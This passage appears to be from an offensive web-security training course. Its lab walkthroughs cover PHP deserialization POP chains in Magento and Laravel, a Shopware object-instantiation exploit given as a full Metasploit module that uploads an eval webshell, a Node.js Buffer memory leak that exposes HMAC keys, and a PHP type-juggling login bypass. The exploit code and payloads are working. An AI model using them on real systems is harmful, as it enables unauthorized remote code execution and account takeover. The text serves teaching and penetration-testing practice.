is reflected, but also the receiving object. This allows us to call any method of any class in the Magento
code base with control of the first argument.


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// lib/Varien/Db/Adapter/Pdo/Mysql.php
protected function _prepareQuery(&$sql, &$bind = array())
// Special query hook
if ($this->_queryHook) {
$object = $this->_queryHook['object'];
$method = $this->_queryHook['method'];
$object->$method($sql, $bind);

From here it wasn’t hard to find a critical method that operates on its properties or its first parameter.
For example, we can jump to the filter() method of the Varien_Filter_Template_Simple class. Here, the
regular expression of a preg_replace() call is built dynamically with the properties _startTag and
_endTag that we control. More importantly, the dangerous eval modifier is already appended to the
regular expression, which leads to the execution of the second preg_replace() argument as PHP code.

// lib/Varien/Filter/Template/Simple.php
public function filter($value)
return preg_replace('#'.$this->_startTag.'(.*?)'.$this->_endTag.'#e',
'$this->getData("$1")', $value);

In the executed PHP code of the second preg_replace() argument, the match of the first group is used
($1). Important to note are the double quotes that allow us to execute arbitrary PHP code by using
curly brace syntax.

Now we can put everything together. We inject a Varien_File_Uploader_Image object that will invoke
the class’ destructor. In the uploader property we create a Varien_Cache_Backend_Database object, in
order to invoke its clean() method. We point the object’s _adapter property to a
Varien_Db_Adapter_Pdo_Mysql object, so that its query() method also triggers the valuable
_prepareQuery() method. In the _options[‘data_table’] property, we can specify our PHP code payload,
for example:


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We also append the string RIPS as delimiter. Then we point the _queryHook property of the
Varien_Db_Adapter_Pdo_Mysql object to a Varien_Filter_Template_Simple object and its filter method.
This method will be called via reflection and receives the following argument:
TRUNCATE TABLE {${system(id)}}RIPS

When we not set the Varien_Filter_Template_Simple object’s property _startTag to TRUNCATE TABLE
and the property _endTag to RIPS the first match group of the regular expression in the preg_replace()
call will be our PHP code. Thus, the following PHP code will be executed:

In order to determine the variables name, the system() call will be evaluated within the curly syntax.
This leads us to execution of arbitrary PHP code or system commands.

The complete exploit that creates the POP chain that we sent can be found below. Note that there is
also a hash validation part. To learn more about it, refer to the original article,

class Zend_Db_Profiler {
protected $_enabled = false;
class Varien_Filter_Template_Simple {
protected $_startTag;
protected $_endTag;
public function __construct() {
$this->_startTag = 'TRUNCATE TABLE ';
$this->_endTag = 'RIPS';
class Varien_Db_Adapter_Pdo_Mysql {
protected $_transactionLevel = 0;
protected $_queryHook;
protected $_profiler;
public function __construct() {
$this->_queryHook = array();
$this->_queryHook['object'] = new Varien_Filter_Template_Simple;
$this->_queryHook['method'] = 'filter';


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$this->_profiler = new Zend_Db_Profiler;
class Varien_Cache_Backend_Database {
protected $_options;
protected $_adapter;
public function __construct() {
$this->_adapter = new Varien_Db_Adapter_Pdo_Mysql;
$this->_options['data_table'] = '{${system(id)}}RIPS';
$this->_options['store_data'] = true;
class Varien_File_Uploader_Image {
public $uploader;
public function __construct() {
$this->uploader = new Varien_Cache_Backend_Database;

$obj = new Varien_File_Uploader_Image;

$b64 = base64_encode(serialize($obj));
$secret = 'Wed, 29 Jan 2020 16:42:59 +0000';
$hash = md5($b64 . $secret);
echo '?ga='.$b64.'&h='.$hash;

Lab 8: Laravel 5.7 POP Chain

Let’s also see how a Laravel 5.7 POP chain was identified and lead to an RCE vulnerability.

To try this attack on the provided Virtual Machine, perform the below.

▪ cd /home/developer/Downloads/laravel57
▪ php artisan serve


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▪ A sample application will be available at The application receives data
through a GET request and its c parameter (example: These
data are insecurely deserialized.
▪ Run the exploit (that leverages the identified POP chain)
o cd
o php chain.php
o Copy the output and supply it to the application’s c parameter.

You should see the specified command (uname -a) inside the chain.php being executed.

Try to figure out how the POP chain was created, start by analyzing

▪ The __destruct() method should catch your attention. The main idea is to construct a payload
that will trigger __destruct() and then call the run method to achieve RCE.

b. PHP Object Injection VS PHP Object Instantiation

So far, we have talked about PHP Object Injection when attacking PHP deserialization. When
pentesting PHP applications there may be cases when we are able to instantiate an object in the PHP
application of an arbitrary class. This is known as PHP Object Instantiation and should not be
confused with PHP Object Injection.

Let’s analyze a PHP Object Instantiation vulnerability in Shopware (version <= 5.3.3 and >= 5.1), to
better understand this attack.
This specific object instantiation vulnerability spans over multiple files and classes. The point of
injection resides in the feature to preview product streams in the shopware backend. Here, the user
parameter sort is received in the loadPreviewAction() method of the
Shopware_Controllers_Backend_ProductStream controller.


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class Shopware_Controllers_Backend_ProductStream extends
public function loadPreviewAction()

$sorting = $this->Request()->getParam('sort');

$streamRepo = $this->get('shopware_product_stream.repository');


The input is then forwarded to the unserialize() method of

Shopware\Components\ProductStream\Repository. Note that this is not a PHP Object Injection
vulnerability and a custom unserialize() method. This method calls another unserialize() method of

namespace Shopware\Components\ProductStream;
class Repository implements RepositoryInterface
public function unserialize($serializedConditions)
return $this->reflector->unserialize($serializedConditions,
'Serialization error in Product stream');

The user input is passed along in the first parameter. Here, it ends up in a foreach loop.

namespace Shopware\Components;


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class LogawareReflectionHelper
public function unserialize($serialized, $errorSource)
classes = [];
foreach($serialized as $className => $arguments)

$classes[] = $this->reflector-
>createInstanceFromNamedArguments($className, $arguments);

return $classes;

Each array key of the user input is then passed to a createInstanceFromNamedArguments() method
as $className.

namespace Shopware\Components;
class ReflectionHelper
public function createInstanceFromNamedArguments($className, $arguments)
$reflectionClass = new \ReflectionClass($className);

$constructorParams = $reflectionClass->getConstructor()-

// Check if all required parameters are given in $arguments

return $reflectionClass->newInstanceArgs($arguments);


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Finally, the keypoint is the instantiation of an object with ReflectionClass of the type specified in
$className. The invocation of the newInstanceArgs() method with user controlled input in
$arguments allows to specify the arguments of the constructor. ReflectionClass is part of the reflection
API introduced with PHP 5. It allows retrieving information (available methods, their awaited
parameters, etc.) about all classes accessible at a given point during execution. As the name implies,
newInstanceArgs() creates an instance of a class with given parameters. So basically, at this point, we
can instantiate arbitrary objects.

Lab 9: Shopware Object Instantiation

To try this attack on the provided Virtual Machine, perform the below.

▪ Power up a pentesting distribution such as Kali Linux

▪ Edit /etc/hosts so that the Virtual Machine’s IP is related to shopware.local

▪ Save the below exploit as shopware_createinstancefromnamedarguments_rce.rb, inside the

/root/.msf4/modules/exploits/http/ directory.

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper


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def initialize(info = {})
'Name' => "Shopware createInstanceFromNamedArguments PHP Object
Instantiation RCE",
'Description' => %q(
This module exploits a php object instantiation vulnerability
that can lead to RCE in
Shopware. An authenticated backend user could exploit the

The vulnerability exists in the

createInstanceFromNamedArguments function, where the code
insufficiently performs whitelist check which can be bypassed
to trigger an object injection.

An attacker can leverage this to deserialize an arbitrary

payload and write a webshell to
the target system, resulting in remote code execution.

Tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.

'License' => MSF_LICENSE,
'Author' =>
'Karim Ouerghemmi', # original discovery
'mr_me <steven@srcincite.io>', # patch bypass, rce & msf
'References' =>
['CVE', '2019-12799'],
# yes really, assigned per request
['CVE', '2017-18357'],
# not really because we bypassed this patch
['URL', 'https://blog.ripstech.com/2017/shopware-php-object-
instantiation-to-blind-xxe/'] # initial writeup w/ limited
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "May 09 2019",
'DefaultTarget' => 0))

OptString.new('TARGETURI', [true, "Base Shopware path", '/']),


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OptString.new('USERNAME', [true, "Backend username to
authenticate with", 'demo']),
OptString.new('PASSWORD', [false, "Backend password to
authenticate with", 'demo'])

def do_login
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'backend', 'Login',
'vars_post' => {
'username' => datastore['username'],
'password' => datastore['password'],
unless res
fail_with(Failure::Unreachable, "Connection failed")
if res.code == 200
cookie =
if res.nil?
return cookie

def get_webroot(cookie)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'backend', 'systeminfo',
'cookie' => cookie
unless res
fail_with(Failure::Unreachable, "Connection failed")
if res.code == 200
return res.body.scan(%r{DOCUMENT_ROOT </td><td class="v">(.*)


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def leak_csrf(cookie)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken',
'cookie' => cookie
unless res
fail_with(Failure::Unreachable, "Connection failed")
if res.code == 200
if res.headers.include?('X-Csrf-Token')
return res.headers['X-Csrf-Token']

def generate_phar(webroot)
php =
pop =
pop << "s:#{php.length}:\"#{php}\";"
pop << "s:36:\"\x00GuzzleHttp\\Cookie\\CookieJar\x00cookies\";"
pop <<
pop << "a:3:{s:5:\"Value\";"
pop << "s:48:\"<?php
eval(base64_decode($_SERVER[HTTP_#{@header}])); ?>\";"
pop << "s:7:\"Expires\";"
pop << "b:1;"
pop << "s:7:\"Discard\";"
pop << "b:0;}}}}"
file = Rex::Text.rand_text_alpha_lower(8)
stub = "<?php __HALT_COMPILER(); ?>\r\n"
file_contents = Rex::Text.rand_text_alpha_lower(20)
file_crc32 = Zlib::crc32(file_contents) & 0xffffffff
manifest_len = 40 + pop.length + file.length
phar = stub
phar << [manifest_len].pack('V') # length of manifest
in bytes
phar << [0x1].pack('V') # number of files in
the phar


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phar << [0x11].pack('v') # api version of the
phar manifest
phar << [0x10000].pack('V') # global phar
bitmapped flags
phar << [0x0].pack('V') # length of phar
phar << [pop.length].pack('V') # length of phar
phar << pop # pop chain
phar << [file.length].pack('V') # length of filename
in the archive
phar << file # filename
phar << [file_contents.length].pack('V') # length of the
uncompressed file contents
phar << [0x0].pack('V') # unix timestamp of
file set to Jan 01 1970.
phar << [file_contents.length].pack('V') # length of the
compressed file contents
phar << [file_crc32].pack('V') # crc32 checksum of
un-compressed file contents
phar << [0x1b6].pack('V') # bit-mapped file-
specific flags
phar << [0x0].pack('V') # serialized File
Meta-data length
phar << file_contents # serialized File
phar << [Rex::Text.sha1(phar)].pack('H*') # signature
phar << [0x2].pack('V') # signiture type
phar << "GBMB" # signature presence
return phar

def upload(cookie, csrf_token, phar)

data = Rex::MIME::Message.new
data.add_part(phar, Rex::Text.rand_text_alpha_lower(8), nil,
"name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'backend', 'mediaManager',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie,
'headers' => {
'X-CSRF-Token' => csrf_token
unless res
fail_with(Failure::Unreachable, "Connection failed")


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if res.code == 200 && res.body =~ /Image is not in a recognized
return true

def leak_upload(cookie, csrf_token)

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'backend',
'MediaManager', 'getAlbumMedia'),
'cookie' => cookie,
'headers' => {
'X-CSRF-Token' => csrf_token
unless res
fail_with(Failure::Unreachable, "Connection failed")
if res.code == 200 && res.body =~ /#{@phar_bd}.jpg/i
bd_path = $1 if res.body =~
return "media/image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg"

def trigger_bug(cookie, csrf_token, upload_path)

sort = {
"Shopware_Components_CsvIterator" => {
"filename" => "phar://#{upload_path}",
"delimiter" => "",
"header" => ""
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'backend',
'ProductStream', 'loadPreview'),
'cookie' => cookie,
'headers' => {
'X-CSRF-Token' => csrf_token
'vars_get' => { 'sort' => sort.to_json }


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unless res
fail_with(Failure::Unreachable, "Connection failed")

def exec_code
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "media",
'raw_headers' => "#{@header}:
}, 1)

def check
cookie = do_login
if cookie.nil?
vprint_error "Authentication was unsuccessful"
return Exploit::CheckCode::Safe
csrf_token = leak_csrf(cookie)
if csrf_token.nil?
vprint_error "Unable to leak the CSRF token"
return Exploit::CheckCode::Safe
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'backend',
'ProductStream', 'loadPreview'),
'cookie' => cookie,
'headers' => { 'X-CSRF-Token' => csrf_token }
if res.code == 200 && res.body =~ /Shop not found/i
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Safe

def exploit
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
@phar_bd = Rex::Text.rand_text_alpha_lower(8)
@shll_bd = Rex::Text.rand_text_alpha_lower(8)
@header = Rex::Text.rand_text_alpha_upper(2)
cookie = do_login
if cookie.nil?


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fail_with(Failure::NoAccess, "Authentication was unsuccessful")
print_good("Stage 1 - logged in with #{datastore['username']}:
web_root = "/var/www/shopware"
# if web_root.nil?
# fail_with(Failure::Unknown, "Unable to leak the webroot")
# end
# print_good("Stage 2 - leaked the web root: #{web_root}")
csrf_token = leak_csrf(cookie)
if csrf_token.nil?
fail_with(Failure::Unknown, "Unable to leak the CSRF token")
print_good("Stage 3 - leaked the CSRF token: #{csrf_token}")
phar = generate_phar(web_root)
print_good("Stage 4 - generated our phar")
if !upload(cookie, csrf_token, phar)
fail_with(Failure::Unknown, "Unable to upload phar archive")
print_good("Stage 5 - uploaded phar")
upload_path = leak_upload(cookie, csrf_token)
if upload_path.nil?
fail_with(Failure::Unknown, "Cannot find phar archive")
print_good("Stage 6 - leaked phar location: #{upload_path}")
trigger_bug(cookie, csrf_token, upload_path)
print_good("Stage 7 - triggered object instantiation!")

▪ Start Metasploit and execute reload_all

▪ Launch the exploit as follows


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The result should be RCE through PHP Object Instantiation!

If you are unfamiliar with phar, please study the below resources.


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a. Subverting HMAC by Attacking Node.js’s Memory

At the end of the Attacking Authentication module, we promised to show you a case where a relatively
secure HMAC implementation can be subverted by attacking Node.js’s memory.

Lab 10: Subverting HMAC

To try this attack on the provided Virtual Machine, perform the below.

▪ cd /home/developer/Downloads/nodejs_hacking/hackme
▪ ./setup.sh

A sample application will be available at

On you will come across the following.

By intercepting the requests we notice two cookies:

▪ session=eyJhZG1pbiI6Im5vIn0=
▪ session.sig=wwg0b0z2AQJ2GCyXHt53ONkIXRs

Base64-decoding the session cookie reveals, {"admin":"no"}. Maybe changing this to yet will
allow us to login. Unfortunately that is not the case because the cookie is HMAC-protected.


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Let’s study the source code to get a better feel of the application.
By studying, app.js we notice that the NodeJS app uses cookie-session var session = require('cookie-
session'), which has a dependency to cookies, which has a dependency to keygrip. And keygrip does
the HMAC signature by using the node core crypto package. crypto creates a Buffer from the key.
Remember this last part…

The config.js file contains dummy session_keys. Based on our code analysis above, those keys should
be used to generate the HMAC for the cookies.

On to the index.js file now, we notice that the /login functionality checks if a password is set. Then it
creates a Buffer() from the password and converts the Buffer to a base64 string, which can then be
compared to secret_password. If this operation is successful, the session would set admin = 'yes'.

That Buffer class is the root cause of a memory-leaking vulnerability that exists. When Buffer is
called with a string, it will create a Buffer containing those bytes. But if it's called with a number,
NodeJS will allocate an n byte big Buffer. But if you look closely, the buffer is not simply <Buffer 00
00 00 00>. It seems to always contain different values. That is because Buffer(number) doesn't zero
the memory, and it can leak data that was previously allocated on the heap. You can read more
about this issue here, https://github.com/nodejs/node/issues/4660.

Since we have a JSON middleware (app.use(bodyParser.json())), we can actually send POST data that
contains a number. And when we do that, the API will return some memory that is leaked from the

If we now remember that crypto creates a Buffer from the key, this means that an old session key
could be leaked from memory.

The attack can be performed, as follows.

curl -X POST -H "Content-Type: application/json"
--data "{\"password\": 100}" | hexdump -C


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After multiple attempts, you will notice session keys being leaked.

With a legitimate session key, it is pretty much game over. You can now create a {"admin": "yes"}
cookie with a valid signature.

b. PHP Type Juggling

Much like Python and JavaScript, PHP is a dynamically typed language. This means that variable types
are checked while the program is executing. Dynamic typing allows developers to be more flexible
when using PHP. But this kind of flexibility sometimes causes unexpected errors in the program flow
and can even introduce critical vulnerabilities into the application.

Let’s dive into PHP type juggling, and how it can lead to authentication bypass vulnerabilities.

How PHP compares values

PHP has a feature called “type juggling”, or “type coercion”. This means that during the comparison
of variables of different types, PHP will first convert them to a common, comparable type.
This in turn makes it possible to compare the number 12 to the string '12' or check whether a string
is empty or not by using a comparison like $string == True.

In other words, type juggling in PHP is caused by an issue of loose operations versus strict operations.
Strict comparisons will compare both the data values and the types associated to them. A loose
comparison will use context to understand what type the data is. According to PHP documentation
for comparison operations at http://php.net/manual/en/language.operators.comparison.php: “If
you compare a number with a string or the comparison involves numerical strings, then each string
is converted to a number and the comparison performed numerically. These rules also apply to the
switch statement. The type conversion does not take place when the comparison is === or !== as this
involves comparing the type as well as the value (strict comparison mode).”


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Two very important charts to keep in mind are the below.

Let’s now utilize what we learned about type juggling against a vulnerable application…


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Lab 11: Authorization Bypass Through Type Juggling

Inside the provided Virtual Machine, edit /etc/hosts as follows.

Navigate to http://shopware.local/juggling.php

The source code of the vulnerable application is the below.

// $FLAG, $USER and $PASSWORD_SHA256 in secret file
// show my source code

$return['status'] = 'Authentication failed!';

if (isset($_POST["auth"])) {
// retrieve JSON data
$auth = @json_decode($_POST['auth'], true);
// check login and password (sha256)
if($auth['data']['login'] == $USER && !strcmp($auth['data']['password'],
$return['status'] = "Access granted! The validation password is:
print json_encode($return);

$pageStart = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

<html xmlns="http://www.w3.org/1999/xhtml">


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<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>MY WEBSITE PAGE</title>
-ui.css" rel="stylesheet" type="text/css" />
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.17/jquery-
<script type="text/javascript">
$(document).ready(function(e) {
<input type="text" id="date" name="date" />

print $pageStart;


According to what we have covered so far regarding type juggling and according to the following
resource (http://repository.root-me.org/Exploitation%20-%20Web/EN%20-
%20PHP%20loose%20comparison%20-%20Type%20Juggling%20-%20OWASP.pdf) we can
exploit the loose comparison in green, as follows.

Toggle the developer tools inside the browser and paste the below into the console.

var data = {'login':true, 'password':[null]}

type: "POST",
dataType: "json",
url: "juggling.php",
data: {auth : JSON.stringify({data})},

The result should be an authorization bypass.


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1. https://github.com/Cisco-AMP/java_security
2. https://www.baeldung.com/java-dynamic-proxies
3. https://mogwailabs.de/blog/2019/04/attacking-rmi-based-jmx-services
4. https://www.veracode.com/blog/research/exploiting-jndi-injections-java
5. https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290
6. http://youdebug.kohsuke.org
7. https://blog.doyensec.com/2019/07/22/jackson-gadgets.html
8. https://websec.wordpress.com/2014/12/08/magento-1-9-0-1-poi
9. https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe
10. https://www.smrrd.de/nodejs-hacking-challenge-writeup.html
11. https://hackinblood.com/php-type-juggling


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